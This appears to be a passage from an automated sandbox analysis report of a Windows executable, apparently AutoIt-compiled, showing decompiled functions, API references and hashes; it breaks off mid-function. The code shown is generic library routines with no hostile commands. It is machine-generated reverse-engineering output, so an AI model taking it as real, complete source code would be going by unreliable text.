CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420B7E
CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420B8B
CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420B98
CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420BA5
CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420BB2
CloseHandle.KERNEL32(?,?,?,?,014209E1,?,01423C13,?,00000001,013F4EA0,?), ref: 01420BBF

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 04c775646e04d7ea2b645904410b35a950947e5524b3c6461789ffed5692541a
Instruction ID: 8f72e39ac7bead11de6ff76368da6ec9fc009b18536b3cef8e508292b008080e
Opcode Fuzzy Hash: 04c775646e04d7ea2b645904410b35a950947e5524b3c6461789ffed5692541a
Instruction Fuzzy Hash: D201A271801B25DFDB309FAAD880813FBF5BF602193158A3FE29652A31C370A984CF80

Uniqueness

Uniqueness Score: -1.00%

Function 013EDB5A, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013EDB5A(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x147d8e0; // 0x147d8d4
					if(_t23 != 0) {
						E013E2DE8(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x147d8e4; // 0x1482304
					if(_t24 != 0) {
						E013E2DE8(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x147d8e8; // 0x1482304
					if(_t25 != 0) {
						E013E2DE8(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x147d910; // 0x147d8d8
					if(_t26 != 0) {
						E013E2DE8(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x147d914; // 0x1482308
					if(_t27 != 0) {
						return E013E2DE8(_t6);
					}
				}
				return _t6;
			}

0x013edb60
0x013edb65
0x013edb69
0x013edb6f
0x013edb72
0x013edb77
0x013edb7b
0x013edb81
0x013edb84
0x013edb89
0x013edb8d
0x013edb93
0x013edb96
0x013edb9b
0x013edb9f
0x013edba5
0x013edba8
0x013edbad
0x013edbae
0x013edbb1
0x013edbb7
0x00000000
0x013edbbf
0x013edbb7
0x013edbc2

APIs

_free.LIBCMT ref: 013EDB72

Part of subcall function 013E2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?), ref: 013E2DFE
Part of subcall function 013E2DE8: GetLastError.KERNEL32(?,?,013EDBF1,?,00000000,?,00000000,?,013EDC18,?,00000007,?,?,013EE016,?,?), ref: 013E2E10

_free.LIBCMT ref: 013EDB84
_free.LIBCMT ref: 013EDB96
_free.LIBCMT ref: 013EDBA8
_free.LIBCMT ref: 013EDBBA

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 74b987b88ceeb109e4a0f0d7d58b8d967f60ba8367119b145b111c2d27b40e74
Instruction ID: b0514832f153f15e2e0eff33f4c5ff3222008a36b2c0515871a2f9fe834e2863
Opcode Fuzzy Hash: 74b987b88ceeb109e4a0f0d7d58b8d967f60ba8367119b145b111c2d27b40e74
Instruction Fuzzy Hash: BFF06272D00329ABDA20EBECE488C1B7BEDBF042143A50805F22DD7590D732F8804B60

Uniqueness

Uniqueness Score: -1.00%

Function 013B1E0E, Relevance: 7.5, APIs: 5, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B1E0E(struct HDC__* _a4, intOrPtr _a8) {
				void* _t7;
				int _t9;

				if( *0x148298c != 0) {
					EndPath(_a4);
					 *0x148298c = 0;
					if(_a8 == 0xfffffffe || _a8 == 0xffffffff) {
						StrokePath(_a4);
					} else {
						StrokeAndFillPath(_a4);
					}
				}
				_t7 =  *0x1482988; // 0x0
				if(_t7 == 0) {
					return _t7;
				} else {
					SelectObject(_a4, _t7);
					 *0x1482988 =  *0x1482988 & 0x00000000;
					_t9 = DeleteObject( *0x1482984);
					 *0x1482984 =  *0x1482984 & 0x00000000;
					 *0x1482994 =  *0x1482994 | 0xffffffff;
					return _t9;
				}
			}

0x013b1e18
0x013b1e1d
0x013b1e27
0x013b1e2e
0x013b1e7a
0x013b1e36
0x013b1e39
0x013b1e39
0x013b1e2e
0x013b1e3f
0x013b1e46
0x013b1e74
0x013b1e48
0x013b1e4c
0x013b1e58
0x013b1e5f
0x013b1e65
0x013b1e6c
0x00000000
0x013b1e6c

APIs

EndPath.GDI32(?), ref: 013B1E1D
StrokeAndFillPath.GDI32(?,?,013F2E7C,00000000,?,?,?), ref: 013B1E39
SelectObject.GDI32(?,00000000), ref: 013B1E4C
DeleteObject.GDI32 ref: 013B1E5F
StrokePath.GDI32(?), ref: 013B1E7A

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e813e5a280ce2ae149818b54716fc6f04a9dfc61fe3109a286ee70dbdacff267
Instruction ID: 3896efc545a761d41fc4c074f693d049d34da274a29a1664045bef3745fc194a
Opcode Fuzzy Hash: e813e5a280ce2ae149818b54716fc6f04a9dfc61fe3109a286ee70dbdacff267
Instruction Fuzzy Hash: 8BF04F31501605EBEB3A5F68F84CBAC7F65BB113AAF089218FA69464F8D7708591EF10

Uniqueness

Uniqueness Score: -1.00%

Function 0141C9D3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0141C9D3(void* __ecx, void* __eflags, intOrPtr _a4) {
				struct tagMENUITEMINFOW _v52;
				struct HMENU__** _v56;
				struct HMENU__* _v60;
				signed int _v64;
				void* __edi;
				char _t30;
				intOrPtr* _t31;
				intOrPtr* _t41;
				int _t51;
				struct HMENU__** _t52;
				struct HMENU__* _t57;
				int _t65;
				intOrPtr* _t66;
				void* _t68;
				signed int _t70;

				_v64 = _v64 | 0xffffffff;
				_t68 = __ecx;
				if(E0141CCEE(__ecx, _a4, (_t70 & 0xfffffff8) - 0x3c) == 0) {
					L18:
					_t30 = 0;
					__eflags = 0;
				} else {
					_t65 = _v64;
					_t51 = 7;
					if(_t65 < _t51) {
						goto L18;
					} else {
						_t3 = _t68 + 0x9d0; // 0x0
						if(_t65 >  *_t3) {
							goto L18;
						} else {
							_t5 = _t65 * 4; // 0x0
							_t31 =  *((intOrPtr*)(__ecx + _t5 + 0x1b4));
							_v56 = _t31;
							_v60 =  *_t31;
							if( *((char*)(_t31 + 4)) != 1) {
								L16:
								_t52 = _v56;
								if(DeleteMenu( *_t52, _t65, 0) == 0) {
									goto L18;
								} else {
									_t52[1] = 0xff;
									 *_t52 = 0;
									E013B99C5(0,  &(_t52[2]), 0, 0xffffffff);
									E0141C66D(_t68, _t65);
									_t30 = 1;
								}
							} else {
								_v52.cbSize = 0x30;
								E013D2760(_t65,  &(_v52.fMask), 0, 0x2c);
								_v52.fMask = 4;
								if(GetMenuItemInfoW(_v60, _t65, 0,  &_v52) == 0) {
									goto L18;
								} else {
									_t57 = _v52.hSubMenu;
									_v60 = _t57;
									if(_t57 != 0 &&  *((intOrPtr*)(_t68 + 0x9d0)) >= _t51) {
										_t18 = _t68 + 0x1d0; // 0x1482b80
										_t66 = _t18;
										do {
											_t41 =  *_t66;
											if(_t41 != 0 &&  *_t41 == _t57) {
												_t84 =  *((char*)(_t41 + 4)) - 1;
												if( *((char*)(_t41 + 4)) != 1) {
													DeleteMenu(_t57, _t51, 0);
													 *((char*)( *_t66 + 4)) = 0xff;
													 *((intOrPtr*)( *_t66)) = 0;
													 *((char*)( *_t66 + 5)) = 0;
													__eflags =  *_t66 + 8;
													E013B99C5( *_t66,  *_t66 + 8, 0, 0xffffffff);
													E0141C66D(_t68, _t51);
												} else {
													E0141C9D3(_t68, _t84, _t51);
												}
												_t57 = _v60;
											}
											_t51 = _t51 + 1;
											_t66 = _t66 + 4;
											_t23 = _t68 + 0x9d0; // 0x0
										} while (_t51 <=  *_t23);
										_t65 = _v64;
									}
									goto L16;
								}
							}
						}
					}
				}
				return _t30;
			}

0x0141c9dc
0x0141c9ea
0x0141c9f3
0x0141cb17
0x0141cb17
0x0141cb17
0x0141c9f9
0x0141c9f9
0x0141c9ff
0x0141ca02
0x00000000
0x0141ca08
0x0141ca08
0x0141ca0e
0x00000000
0x0141ca14
0x0141ca14
0x0141ca14
0x0141ca1b
0x0141ca25
0x0141ca29
0x0141cae2
0x0141cae2
0x0141caf3
0x00000000
0x0141caf5
0x0141caf7
0x0141cb03
0x0141cb05
0x0141cb0d
0x0141cb14
0x0141cb14
0x0141ca2f
0x0141ca35
0x0141ca40
0x0141ca48
0x0141ca64
0x00000000
0x0141ca6a
0x0141ca6a
0x0141ca6e
0x0141ca74
0x0141ca7e
0x0141ca7e
0x0141ca84
0x0141ca84
0x0141ca88
0x0141ca8e
0x0141ca92
0x0141caa2
0x0141caaf
0x0141cab5
0x0141cab9
0x0141cabe
0x0141cac1
0x0141cac9
0x0141ca94
0x0141ca97
0x0141ca97
0x0141cace
0x0141cace
0x0141cad2
0x0141cad3
0x0141cad6
0x0141cad6
0x0141cade
0x0141cade
0x00000000
0x0141ca74
0x0141ca64
0x0141ca29
0x0141ca0e
0x0141ca02
0x0141cb1f

APIs

GetMenuItemInfoW.USER32 ref: 0141CA5C
DeleteMenu.USER32(?,00000007,00000000), ref: 0141CAA2
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,014829B0,019B59A8), ref: 0141CAEB

Strings

0, xrefs: 0141CA35

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: c681203b950a89aca392fd1b47c5892772aa06201efc0b065b24a97e8daaed36
Instruction ID: 010e952e9153c75fb83e0d0343eb454a14b130bde88bd7a836c1ad3408acb7ac
Opcode Fuzzy Hash: c681203b950a89aca392fd1b47c5892772aa06201efc0b065b24a97e8daaed36
Instruction Fuzzy Hash: 9641BD312443429FD721DF28DC84B2BBBE4FB95764F04461EE665972A9E730A804CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01419D84, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01419D84(void* __ebx, char* __ecx, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				signed short _t16;
				signed int _t23;
				signed int _t28;
				void* _t32;
				signed int _t37;
				void* _t43;
				void* _t46;
				signed short* _t48;

				_t47 = _a4;
				_t44 = __ecx;
				if(E013D922B(__ebx, __ecx, _a4, _a4, L"#notrayicon", 0xb) != 0) {
					_t16 = E013D922B(__ebx, __ecx, _t47, _t47, L"#requireadmin", 0xd);
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = E013D922B(__ebx, __ecx, _t47, _t47, L"#OnAutoItStartRegister", 0x16);
						if(__eflags != 0) {
							L2:
							return 1;
						}
						_push(__ebx);
						_t48 = E013B7A0C(_t47 + 0x2c, __eflags);
						E013B7BB5(_t48);
						E013B7CA2(__eflags, _t48);
						_t23 = E013D4D83(_t48);
						_t32 = 0x22;
						_t37 =  *(_t48 + _t23 * 2 - 2) & 0x0000ffff;
						__eflags = _t37 - _t32;
						if(_t37 == _t32) {
							L12:
							__eflags =  *_t48 - _t37;
							if( *_t48 == _t37) {
								__eflags = 0;
								 *(_t48 + _t23 * 2 - 2) = 0;
								_t12 =  &(_t48[1]); // 0x2
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 4)))) + 8))(_t12);
								L15:
								_t46 = 1;
								__eflags = 1;
								L16:
								E013D0234(_t48);
								return _t46;
							}
							L13:
							_t46 = 0;
							goto L16;
						}
						_t43 = 0x27;
						__eflags = _t37 - _t43;
						if(_t37 == _t43) {
							goto L12;
						}
						_t28 =  *_t48 & 0x0000ffff;
						__eflags = _t28 - _t32;
						if(_t28 == _t32) {
							goto L13;
						}
						__eflags = _t28 - _t43;
						if(_t28 == _t43) {
							goto L13;
						}
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 4)))) + 8))(_t48);
						goto L15;
					}
					 *((char*)(__ecx + 1)) = 1;
					goto L2;
				}
				 *__ecx = 1;
				goto L2;
			}

0x01419d88
0x01419d94
0x01419da0
0x01419db6
0x01419dbe
0x01419dc0
0x01419dd8
0x01419dda
0x01419da5
0x00000000
0x01419da7
0x01419ddc
0x01419de5
0x01419de8
0x01419dee
0x01419df4
0x01419dfc
0x01419dfd
0x01419e02
0x01419e05
0x01419e27
0x01419e27
0x01419e2a
0x01419e30
0x01419e32
0x01419e37
0x01419e40
0x01419e43
0x01419e45
0x01419e45
0x01419e46
0x01419e47
0x00000000
0x01419e4f
0x01419e2c
0x01419e2c
0x00000000
0x01419e2c
0x01419e09
0x01419e0a
0x01419e0d
0x00000000
0x00000000
0x01419e0f
0x01419e12
0x01419e15
0x00000000
0x00000000
0x01419e17
0x01419e1a
0x00000000
0x00000000
0x01419e22
0x00000000
0x01419e22
0x01419dc2
0x00000000
0x01419dc2
0x01419da2
0x00000000

APIs

_wcslen.LIBCMT ref: 01419DF4

Strings

#OnAutoItStartRegister, xrefs: 01419DCA
#notrayicon, xrefs: 01419D8E
#requireadmin, xrefs: 01419DB0

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: d5f61a73ed3ee5fbd33a74bed135d8c9d1bffbd8200f9e735e95a55da1d3e8ae
Instruction ID: d4794e26b94d5e8cce030c9020037ab6f42606b84719e5f0bcee13bc22031bc2
Opcode Fuzzy Hash: d5f61a73ed3ee5fbd33a74bed135d8c9d1bffbd8200f9e735e95a55da1d3e8ae
Instruction Fuzzy Hash: F9213B321002126AD321A63DEC11FBB73D8DFA1328F44442BFA49872A9E7716952C391

Uniqueness

Uniqueness Score: -1.00%

Function 0141089E, Relevance: 6.3, APIs: 4, Instructions: 322
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0141089E(intOrPtr* __ecx, signed int __edx, WCHAR* _a4, intOrPtr* _a12) {
				void* _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _t136;
				intOrPtr* _t139;
				intOrPtr* _t143;
				intOrPtr* _t146;
				void* _t150;
				intOrPtr* _t154;
				void* _t156;
				signed int _t160;
				signed short _t162;
				signed short _t164;
				signed short _t168;
				signed short _t172;
				intOrPtr* _t173;
				intOrPtr* _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t183;
				intOrPtr* _t186;
				intOrPtr* _t190;
				intOrPtr* _t194;
				intOrPtr* _t196;
				void* _t197;
				intOrPtr* _t201;
				intOrPtr* _t203;
				WCHAR* _t205;
				signed int _t209;
				intOrPtr* _t216;
				signed int _t218;
				char _t245;
				signed int _t248;
				intOrPtr* _t252;
				signed int _t260;
				signed short _t261;
				signed short* _t262;
				signed short _t263;
				void* _t264;
				void* _t265;

				_t136 = _a12;
				_t260 = __edx;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 0xc)) = 0;
				_push( &_v8);
				_push(0x800);
				_push(0);
				_push(__ecx);
				_v8 = 0;
				_t264 =  *((intOrPtr*)( *__ecx + 0x10))();
				_t139 = _v8;
				if(_t264 < 0) {
					L55:
					if(_t139 != 0) {
						 *((intOrPtr*)( *_t139 + 8))(_t139);
					}
					return _t264;
				}
				if(_t139 != 0) {
					_v12 = 0;
					_t264 =  *((intOrPtr*)( *_t139 + 0xc))(_t139,  &_v16);
					if(_t264 < 0) {
						L54:
						_t139 = _v8;
						goto L55;
					}
					_t245 = _v16;
					_push(3);
					_pop(0);
					if( *((intOrPtr*)(_t245 + 0x28)) != 0 || ( *(_t245 + 0x36) & 0x00000040) == 0) {
						L15:
						_t143 = _v8;
						_v24 = _v24 | 0xffffffff;
						_push( &_v24);
						_push(1);
						_push( &_a4);
						_push(_t143);
						if( *((intOrPtr*)( *_t143 + 0x28))() >= 0) {
							L18:
							_t261 = 0;
							if(0 >=  *((intOrPtr*)(_v16 + 0x2c))) {
								L23:
								_t146 = _v8;
								 *((intOrPtr*)( *_t146 + 0x4c))(_t146, _v16);
								_t248 = _v12;
								if(_t248 == 0) {
									L26:
									_t264 = 0x80004005;
									goto L54;
								}
								if( *((short*)(_t248 + 0x18)) <= 0x20) {
									_t216 = _a12;
									_v28 = _v28 & 0x00000000;
									 *_t216 = 1;
									if(0 >=  *((intOrPtr*)(_t248 + 0x18))) {
										L46:
										_t150 = ( *(_t248 + 0x24) & 0x0000ffff) - 0x16;
										if(_t150 == 0) {
											L53:
											 *((short*)(_t216 + 0xc)) = 0;
											 *((intOrPtr*)(_t216 + 4)) =  *((intOrPtr*)(_t248 + 0x10));
											 *((intOrPtr*)(_t216 + 8)) =  *((intOrPtr*)(_t248 + 0x14));
											 *((short*)(_t216 + 0xe)) =  *((intOrPtr*)(_t248 + 0x18));
											_t154 = _v8;
											 *((intOrPtr*)( *_t154 + 0x50))(_t154, _t248);
											_t264 = 0;
											goto L54;
										}
										_t156 = _t150 - 1;
										if(_t156 == 0) {
											_push(0x13);
											L52:
											_pop(0);
											goto L53;
										}
										if(_t156 == 1) {
											goto L53;
										}
										_push(0xa);
										goto L52;
									}
									_t209 = _v28;
									_t262 = _t216 + 0x10;
									_t265 = 0;
									do {
										_t160 =  *( *((intOrPtr*)(_t248 + 8)) + _t265 + 4) & 0x0000ffff;
										_t218 = _t160;
										 *_t262 = _t160;
										if(_t218 == 0x1a) {
											_t172 =  *( *((intOrPtr*)( *((intOrPtr*)(_t248 + 8)) + _t265)) + 4) | 0x00004000;
											_t218 = _t172 & 0x0000ffff;
											 *_t262 = _t172;
										}
										if(_t218 == 0x1b) {
											_t168 =  *( *((intOrPtr*)( *((intOrPtr*)(_t248 + 8)) + _t265)) + 4) | 0x00002000;
											_t218 = _t168 & 0x0000ffff;
											 *_t262 = _t168;
										}
										if(_t218 == 0x1d) {
											_t164 = E0141074D(_v8,  *((intOrPtr*)( *((intOrPtr*)(_t248 + 8)) + _t265)));
											_t248 = _v12;
											 *_t262 = _t164;
										}
										_t209 = _t209 + 1;
										_t162 =  *((intOrPtr*)( *((intOrPtr*)(_t248 + 8)) + _t265 + 0xc));
										_t265 = _t265 + 0x10;
										_t262[1] = _t162;
										_t262 =  &(_t262[2]);
									} while (_t209 <  *((short*)(_t248 + 0x18)));
									_t216 = _a12;
									_push(3);
									_pop(0);
									goto L46;
								}
								_t173 = _v8;
								 *((intOrPtr*)( *_t173 + 0x50))(_t173, _t248);
								goto L26;
							} else {
								goto L19;
							}
							while(1) {
								L19:
								_t175 = _v8;
								_t264 =  *((intOrPtr*)( *_t175 + 0x14))(_t175, _t261 & 0x0000ffff,  &_v12);
								if(_t264 < 0) {
									break;
								}
								_t252 = _v12;
								if(( *(_t252 + 0x10) & 0x00000003) == 0 ||  *_t252 != _v24) {
									_t179 = _v8;
									 *((intOrPtr*)( *_t179 + 0x50))(_t179, _t252);
									_v12 = _v12 & 0x00000000;
									_t261 = _t261 + 1;
									if(_t261 <  *((intOrPtr*)(_v16 + 0x2c))) {
										continue;
									}
								}
								goto L23;
							}
							_t177 = _v8;
							L35:
							 *((intOrPtr*)( *_t177 + 0x4c))(_t177, _v16);
							goto L54;
						}
						_t183 = _v8;
						_v20 = _v20 & 0x00000000;
						_push( &_v28);
						_push(1);
						_push( &_v20);
						_push(_t260);
						_push(_t183);
						if( *((intOrPtr*)( *_t183 + 0x1c))() < 0) {
							_t263 = 0;
							if(0 >=  *((intOrPtr*)(_v16 + 0x2c))) {
								goto L23;
							} else {
								goto L28;
							}
							while(1) {
								L28:
								_t186 = _v8;
								_t264 =  *((intOrPtr*)( *_t186 + 0x14))(_t186, _t263 & 0x0000ffff,  &_v12);
								_t177 = _v8;
								if(_t264 < 0) {
									goto L35;
								}
								 *((intOrPtr*)( *_t177 + 0x30))(_t177,  *_v12,  &_v20, 0, 0, 0);
								if(( *(_v12 + 0x10) & 0x00000003) == 0 || lstrcmpiW(_v20, _a4) != 0) {
									__imp__#6(_v20);
									_t190 = _v8;
									 *((intOrPtr*)( *_t190 + 0x50))(_t190, _v12);
									_v12 = _v12 & 0x00000000;
									_t263 = _t263 + 1;
									if(_t263 <  *((intOrPtr*)(_v16 + 0x2c))) {
										continue;
									}
								} else {
									__imp__#6(_v20);
								}
								goto L23;
							}
							goto L35;
						}
						__imp__#6(_v20);
						_v24 = _t260;
						goto L18;
					} else {
						_t194 = _v8;
						 *((intOrPtr*)( *_t194 + 0x4c))(_t194, _t245);
						_t196 = _v8;
						_t197 =  *((intOrPtr*)( *_t196 + 0x20))(_t196, 0xffffffff,  &_v28);
						_t139 = _v8;
						if(_t197 >= 0) {
							_v20 = _v20 & 0x00000000;
							_push( &_v20);
							_push(_v28);
							_push(_t139);
							if( *((intOrPtr*)( *_t139 + 0x38))() >= 0) {
								E01410717( &_v8,  &_v20);
								_t201 = _v8;
								_t264 =  *((intOrPtr*)( *_t201 + 0xc))(_t201,  &_v16);
								if(_t264 >= 0) {
									_t203 = _v20;
									if(_t203 != 0) {
										 *((intOrPtr*)( *_t203 + 8))(_t203);
									}
									goto L15;
								}
								L11:
								_t205 = _v20;
								if(_t205 != 0) {
									 *((intOrPtr*)( *_t205 + 8))(_t205);
								}
								goto L54;
							}
							_t264 = 0x80004005;
							goto L11;
						}
						_t264 = 0x80004005;
						goto L55;
					}
				} else {
					_t264 = 0x80004001;
					goto L55;
				}
			}

0x014108a4
0x014108aa
0x014108b0
0x014108b2
0x014108ba
0x014108bb
0x014108c0
0x014108c1
0x014108c2
0x014108c8
0x014108ca
0x014108cf
0x01410bec
0x01410bee
0x01410bf3
0x01410bf3
0x01410bfc
0x01410bfc
0x014108d7
0x014108e3
0x014108f0
0x014108f4
0x01410be9
0x01410be9
0x00000000
0x01410be9
0x014108fa
0x014108fd
0x014108ff
0x01410903
0x0141099b
0x0141099b
0x014109a1
0x014109a5
0x014109a6
0x014109ad
0x014109ae
0x014109b4
0x014109e2
0x014109e7
0x014109ed
0x01410a32
0x01410a32
0x01410a3b
0x01410a3e
0x01410a43
0x01410a5a
0x01410a5a
0x00000000
0x01410a5a
0x01410a4a
0x01410b00
0x01410b05
0x01410b09
0x01410b13
0x01410ba4
0x01410ba8
0x01410bab
0x01410bc5
0x01410bc5
0x01410bcc
0x01410bd2
0x01410bd9
0x01410bdd
0x01410be4
0x01410be7
0x00000000
0x01410be7
0x01410bad
0x01410bb0
0x01410bc2
0x01410bc4
0x01410bc4
0x00000000
0x01410bc4
0x01410bb5
0x00000000
0x01410bbe
0x01410bba
0x00000000
0x01410bba
0x01410b19
0x01410b1c
0x01410b1f
0x01410b21
0x01410b24
0x01410b29
0x01410b2b
0x01410b31
0x01410b42
0x01410b45
0x01410b48
0x01410b48
0x01410b4f
0x01410b60
0x01410b63
0x01410b66
0x01410b66
0x01410b6d
0x01410b78
0x01410b7d
0x01410b80
0x01410b80
0x01410b86
0x01410b87
0x01410b8c
0x01410b8f
0x01410b93
0x01410b9a
0x01410b9e
0x01410ba1
0x01410ba3
0x00000000
0x01410ba3
0x01410a50
0x01410a57
0x00000000
0x00000000
0x00000000
0x00000000
0x014109ef
0x014109ef
0x014109ef
0x01410a00
0x01410a04
0x00000000
0x00000000
0x01410a0a
0x01410a11
0x01410a1a
0x01410a21
0x01410a27
0x01410a2b
0x01410a30
0x00000000
0x00000000
0x01410a30
0x00000000
0x01410a11
0x01410aef
0x01410af2
0x01410af8
0x00000000
0x01410af8
0x014109b6
0x014109bc
0x014109c0
0x014109c1
0x014109c8
0x014109c9
0x014109ca
0x014109d0
0x01410a69
0x01410a6f
0x00000000
0x00000000
0x00000000
0x00000000
0x01410a71
0x01410a71
0x01410a71
0x01410a82
0x01410a84
0x01410a89
0x00000000
0x00000000
0x01410a9d
0x01410aa7
0x01410abc
0x01410ac2
0x01410acb
0x01410ad1
0x01410ad5
0x01410ada
0x00000000
0x00000000
0x01410ae1
0x01410ae4
0x01410ae4
0x00000000
0x01410aa7
0x00000000
0x01410a71
0x014109d9
0x014109df
0x00000000
0x01410913
0x01410913
0x0141091a
0x0141091d
0x01410929
0x0141092e
0x01410931
0x0141093d
0x01410946
0x01410947
0x0141094a
0x01410950
0x01410960
0x01410965
0x01410972
0x01410976
0x0141098e
0x01410993
0x01410998
0x01410998
0x00000000
0x01410993
0x01410978
0x01410978
0x0141097d
0x01410986
0x01410986
0x00000000
0x0141097d
0x01410952
0x00000000
0x01410952
0x01410933
0x00000000
0x01410933
0x014108d9
0x014108d9
0x00000000
0x014108d9

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a1c7cded900009c3ccda1d71f7020c2d654f7eba7ef57560883e1189cfaabd
Instruction ID: 4f7904844b776d8e912a74b7a2908b29e080169c5a5b9549859ed7eb0fe31f79
Opcode Fuzzy Hash: 26a1c7cded900009c3ccda1d71f7020c2d654f7eba7ef57560883e1189cfaabd
Instruction Fuzzy Hash: 75C15C75A00206EFDB14CF98C894AAEBBB5FF48714F10859AF505DB265D731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E42A0, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E013E42A0(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
